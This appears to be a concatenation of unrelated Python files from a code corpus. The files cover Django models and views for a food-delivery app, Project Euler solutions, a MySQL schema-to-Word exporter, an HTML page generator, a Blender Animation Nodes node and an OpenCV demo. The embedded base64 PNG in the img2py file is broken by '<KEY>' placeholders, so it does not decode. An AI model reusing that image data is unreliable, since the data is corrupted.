selling_price = models.IntegerField(
verbose_name=_("Selling Price")
)
status = models.CharField(
max_length=200,
verbose_name=_("Status"),
choices=PARTNUMBER_STATUS
)
unit_measure = models.ForeignKey(
"UnitMeasure",
verbose_name=_("Stock/UM"),
on_delete=models.CASCADE
)
class Meta:
db_table = _("partnumbers")
verbose_name = _("Part Number")
verbose_name_plural = _("Parts Number")
ordering = ["id"]
def __str__(self):
return self.partnumber
def get_absolute_url(self):
return reverse('parts_number_read_view', args=[str(self.id)])
# !Find way to handle this feat in template
@property
def add_leading_zero(self):
return str(self.selling_price) + ".00"
class UnitMeasure(AbstractUpdateViewManager, TimeStampModel):
um = models.CharField(
max_length=20,
verbose_name=_("Unit of Measure")
)
class Meta:
db_table = _("um")
verbose_name = _("Unit of Measure")
verbose_name_plural = _("Unit of Measures")
ordering = ["id"]
def __str__(self):
return self.um
class PartNumberClass(AbstractUpdateViewManager, TimeStampModel):
class_name = models.CharField(
max_length=20,
verbose_name=_("Class name")
)
charge_type = models.CharField(
max_length=20,
verbose_name=_("Charge Type")
)
class Meta:
db_table = _("partnumber_class")
verbose_name = _("Part Number Class")
verbose_name_plural = _("Part Number Classes")
ordering = ["id"]
def __str__(self):
return self.class_name.upper()
def get_absolute_url(self):
return reverse('item_class_read', args=[str(self.id)])
| 2.140625 | 2 |
backend/app/views/common_data.py | Edinburgh-Genome-Foundry/CAB | 19 | 12794340 | <reponame>Edinburgh-Genome-Foundry/CAB<gh_stars>10-100
import os
data_path = os.path.join("app", "data", "example_data_file.txt")
with open(data_path, "r") as f:
DATA = f.read()
| 1.867188 | 2 |
example_problem/settings/daphne_fields.py | seakers/daphne-brain | 0 | 12794341 | daphne_fields = ['context', 'data']
| 1.015625 | 1 |
python/problem6.py | shubhamoy/project-euler-solutions | 1 | 12794342 | <filename>python/problem6.py
#!/usr/bin/python
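# Project Euler 6: difference between the square of the sum and the sum of the squares of the first 100 natural numbers.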
sosq = 0
sqos = 0
for i in range(1, 101):
sosq += i*i
sqos += i
diff = (sqos * sqos) - sosq
print "Sum of Squares: ", str(sosq)
print "Squares of Sum: ", str(sqos*sqos)
print "Difference: ", str(diff)
| 3.484375 | 3 |
euler-29.py | TFabijo/euler | 0 | 12794343 | <filename>euler-29.py
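# Project Euler 29: count the distinct values of a**b for 2 <= a <= a_max and 2 <= b <= b_max.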
def različne_potence(a_max,b_max):
stevila = set()
for a in range(2,a_max+1):
for b in range(2,b_max+1):
stevila.add(a**b)
return len(stevila)
različne_potence(100,100)
| 3.078125 | 3 |
Icons/fu4028.py | friedc/fu | 0 | 12794344 | #----------------------------------------------------------------------
# This file was generated by C:\Python27\Scripts\img2py
#
from wx.lib.embeddedimage import PyEmbeddedImage
fu4028 = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B"
"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t"
"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk"
"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp"
"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3"
"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H"
"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH"
"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr"
"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV"
"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db"
"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1"
"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY"
"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+"
"<KEY>
"<KEY>"
"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv"
"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o"
"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR"
"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99"
"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr"
"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U"
"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl"
"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x"
"<KEY>"
"<KEY>"
"<KEY>"
"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU"
"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD"
"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j"
"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS"
"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ"
"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN"
"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK"
"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM"
"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW"
"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy"
"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA"
"AAAASUVORK5CYII=")
getfu4028Data = fu4028.GetData
getfu4028Image = fu4028.GetImage
getfu4028Bitmap = fu4028.GetBitmap
| 1.421875 | 1 |
src/main.py | feizhang365/tablestruct2word | 0 | 12794345 | # -*- encoding: utf-8 -*- #
__author__ = 'FeiZhang <EMAIL>'
__date__ = '2019-07-20'
from mysqlconn import MyConn
from settings import DB_CONFIG
from gendocx import gen_doc, doc_append_table
def main():
"""
entry point
:return:
"""
try:
my_conn = MyConn(DB_CONFIG)
conn = my_conn.conn
with conn.cursor() as cursor:
cursor.execute("SHOW TABLES")
tb_list = cursor.fetchall()
doc = gen_doc('数据库表结构说明', 'FEIZHANG')
for tb in tb_list:
print(tb)
tb_name = tb[0]
cursor.execute("SHOW FULL FIELDS FROM {}".format(tb_name))
# Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment
tb_rs = cursor.fetchall()
# get table comment info
cursor.execute("SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\
AND table_name='{}'".format(DB_CONFIG['db'], tb_name))
tb_comment = cursor.fetchone()[0]
# print("列名", "数据类型", "Null", "Key", "Default", "栏位说明")
# for r in tb_rs:
# print(r[0], r[1], r[3], r[4], r[5], r[8])
doc_append_table(doc, tb_rs, tb_name, tb_comment)
output_file_name = "outputdoc/{}.docx".format(DB_CONFIG['db'])
        doc.save(output_file_name)
finally:
conn.close()
if __name__ == '__main__':
main()
| 2.6875 | 3 |
mtml/toy/tests/test_avimadsen.py | crb479/mcdevitt-trauma-ml | 5 | 12794346 | from ..avimadsen import add_user_tag
from .. import echo_args
def test_avimadsen():
wrapped_echo_args = add_user_tag(echo_args)
print(wrapped_echo_args('test1', 'test2'))
assert(hasattr(wrapped_echo_args, '__user_tag__') and
(wrapped_echo_args.__user_tag__ == 'avimadsen')) | 2.609375 | 3 |
pyPack/html.py | slozano54/projetDNB | 1 | 12794347 | #!/usr/bin/python3
#-*- coding: utf8 -*-
# @author : <NAME>
"""
Génère une page HTML.
"""
pass
# On fait les imports nécessaires selon le contexte
# Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML
import os
# Imports needed depending on the context
# Used to generate the HTML files
if __name__ == "__main__":
from HTML_constantes import *
else:
from pyPack.HTML_constantes import *
############################################################################################################
# Generate the pagesWeb/index.html file
############################################################################################################
def main():
"""
Fonction principale qui sera appelée pour générer l'ensemble des pages HTML.
"""
pass
# On remonte d'un niveau
#os.chdir("../")
# On crée le dossier qui va accueillir les fichiers HTML si il n'existe pas
if not os.path.exists("./pagesWeb/"):
os.mkdir("./pagesWeb/")
    # Open, for writing, the HTML file that will receive the code
indexHTML = open("./pagesWeb/index.html", "w")
    # Add the doctype and the head
for elt in docTypeHeadStyle:
indexHTML.writelines(elt)
    # Open the body
indexHTML.writelines(["<body>\n"])
    # Add the navigation bar elements
for elt in barreDeNavigation:
indexHTML.writelines(elt)
    # Add a page-specific section
indexHTML.writelines([
"""
<h2>ACCUEIL</h2>\n
<p> Le projet consiste à récupérer tous les exercices des sujets DNB en partage sur le site de l'APMEP<br>
Pour le moment le test se fait sur le premier exo du sujet de polynésie 2020<br><br>
Pour générer la documentation il faut installer le paquet python <a href="https://pdoc3.github.io/pdoc/" target="_blank"> pdoc3</a>
</p>
<h3>Auteur</h3>
<p><NAME></p>
<h3> Installation et utilisation </h3>
<p>La procédure a été testé sous <b>Linux</b> uniquement.
<ul>
<li>Télécharger cette <a href="https://github.com/slozano54/projetDNB/archive/master.zip"> archive zip</a></li>
<li>Décompresser l'archive</li>
<li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li>
<li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li>
<li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li>
</ul>
</p>
<h3> Notes </h3>
<p>
Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br>
Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br>
<a class="navButton" href="../exercices_corrections_pdf/" target="_blank"><span>voir les fichiers pdf</span></a>
<a class="navButton" href="../exercices_corrections_pdf_crop/" target="_blank"><span>voir les fichiers pdf ajustés</span></a>
<a class="navButton" href="../exercices_corrections_png/" target="_blank"><span>voir les fichiers png ajustés</span></a>
<br>
<a class="navButton" href="https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf" target="_blank"><span>compiler un fichier tex sur overleaf</span></a>
<a class="navButton" href="../tex_a_compiler/dnb_2013_04_pondichery_1.tex" target="_blank"><span>télécharger le fichier source tex </span></a>
</p>
<h3> License <a href="https://choosealicense.com/licenses/mit/" target="_blank">MIT</a><h3>
"""
])
    # Close the body
indexHTML.writelines([
"""
</body>\n
</html>\n
"""
])
    # Close the file
indexHTML.close()
if __name__ == "__main__":
main() | 2.765625 | 3 |
src/deliverer/views.py | OrenBen-Meir/Meal-Spot | 0 | 12794348 | from django.shortcuts import render, redirect, get_list_or_404, get_object_or_404
from database.models import user, restaurant, address
from helper import parse_req_body, userTypeChecker
import django.views
# Create your views here.
def home(request):
my_user = None
# makes sure user is deliverer
try:
my_user = request.user
userIs = userTypeChecker(my_user)
if userIs(user.Deliverer) != True:
response = redirect('home-nexus')
return response
except Exception as e:
print(e)
response = redirect('home-nexus')
return response
except:
response = redirect('home-nexus')
return response
my_deliverer = user.Deliverer.objects.get(user=my_user)
registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
if registered != True: # if not registered
return redirect('deliverer-register')
if request.method == "POST": # If bidded
body = parse_req_body(request.body)
amount = body['amount']
order_id = body['orderId']
order = restaurant.Order.objects.get(id=order_id)
new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order)
new_bid.save()
unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant)
pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False)
won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True)
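    # An order is open for this deliverer only while it has no chosen bid and the deliverer has not already placed a pending bid on it.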
open_orders = []
for order in unchosen_orders:
if len(pending_bids.filter(order=order)) == 0:
open_orders.append(order)
print(open_orders)
print(pending_bids)
print(won_bids)
context = {
'warnings': my_deliverer.warnings,
'openOrders': open_orders,
'pendingBids': pending_bids,
'winningBids': won_bids
}
return render(request, 'deliverer/home.html', context=context)
def register(request):
my_user = None
try:
my_user = request.user
isType = userTypeChecker(my_user)
if isType(user.Deliverer) != True:
response = redirect('home-nexus')
return response
except:
response = redirect('home-nexus')
return response
my_deliverer = user.Deliverer.objects.get(user=my_user)
registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
if registered:
return redirect('deliverer-home')
registering = my_deliverer.restaurant == None and my_deliverer.status != 'H'
restaurants = restaurant.Restaurant.objects.all()
context={'restaurants': restaurants, 'registering': registering}
if request.method == "POST":
body = parse_req_body(request.body)
resturant_id = int(body['id'])
reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id)
my_deliverer.restaurant = reg_resturant
my_deliverer.save()
context['registering'] = False
return render(request, 'deliverer/register.html', context=context)
def order(request, pk):
my_user = request.user
order = get_object_or_404(restaurant.Order, pk=pk)
customer = order.customer
customer_address = address.CustomerAddress.objects.get(customer=customer)
my_resturant = user.Deliverer.objects.get(user=my_user).restaurant
restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant)
if(request.method == "POST"):
body = parse_req_body(request.body)
rating = int(body['rating'])
        if 0 <= rating <= 5:
order.status = 'D'
order.customer_rating = rating
try:
customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant)
except:
customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N')
customer_status.save()
customer_status.update_status(rating)
order.save()
rating = order.delivery_rating
return render(request, 'deliverer/order.html', context={
'order': order,
'customerAddress': customer_address,
'restaurantAddress': restaurant_address
}) | 2.09375 | 2 |
scripts/addons/animation_nodes/nodes/object/object_attribute_input.py | Tilapiatsu/blender-custom_conf | 2 | 12794349 | <reponame>Tilapiatsu/blender-custom_conf
import bpy
from bpy.props import *
from ... utils.code import isCodeValid
from ... events import executionCodeChanged
from ... base_types import AnimationNode
class ObjectAttributeInputNode(bpy.types.Node, AnimationNode):
bl_idname = "an_ObjectAttributeInputNode"
bl_label = "Object Attribute Input"
bl_width_default = 160
errorHandlingType = "MESSAGE"
attribute: StringProperty(name = "Attribute", default = "",
update = executionCodeChanged)
def create(self):
self.newInput("Object", "Object", "object", defaultDrawType = "PROPERTY_ONLY")
self.newOutput("Generic", "Value", "value")
def draw(self, layout):
layout.prop(self, "attribute", text = "")
def drawAdvanced(self, layout):
self.invokeFunction(layout, "createAutoExecutionTrigger", text = "Create Execution Trigger")
def getExecutionCode(self, required):
code = self.evaluationExpression
if not isCodeValid(code):
yield "self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)"
yield "value = None"
return
yield "try:"
yield " " + code
yield "except:"
yield " if object: self.setErrorMessage('Attribute not found')"
yield " value = None"
@property
def evaluationExpression(self):
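        # Paths starting with "[" are treated as subscript lookups (e.g. ["prop"]); anything else is dotted attribute access on the object.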
if self.attribute.startswith("["): return "value = object" + self.attribute
else: return "value = object." + self.attribute
def createAutoExecutionTrigger(self):
item = self.nodeTree.autoExecution.customTriggers.new("MONITOR_PROPERTY")
item.idType = "OBJECT"
item.dataPath = self.attribute
item.object = self.inputs["Object"].object
| 2 | 2 |
opencv/commercial/Instructions/OpenCV_Basics/image/image.py | SSG-DRD-IOT/commercial-iot-security-system | 0 | 12794350 | <gh_stars>0
import cv2
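# Load the image from disk, display it until a key press, save a copy, then close the window.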
img = cv2.imread( 'image.jpg' )
cv2.imshow( "Image", img )
cv2.waitKey( 0 )
cv2.imwrite( "new_image.jpg", img )
cv2.destroyAllWindows()
| 2.78125 | 3 |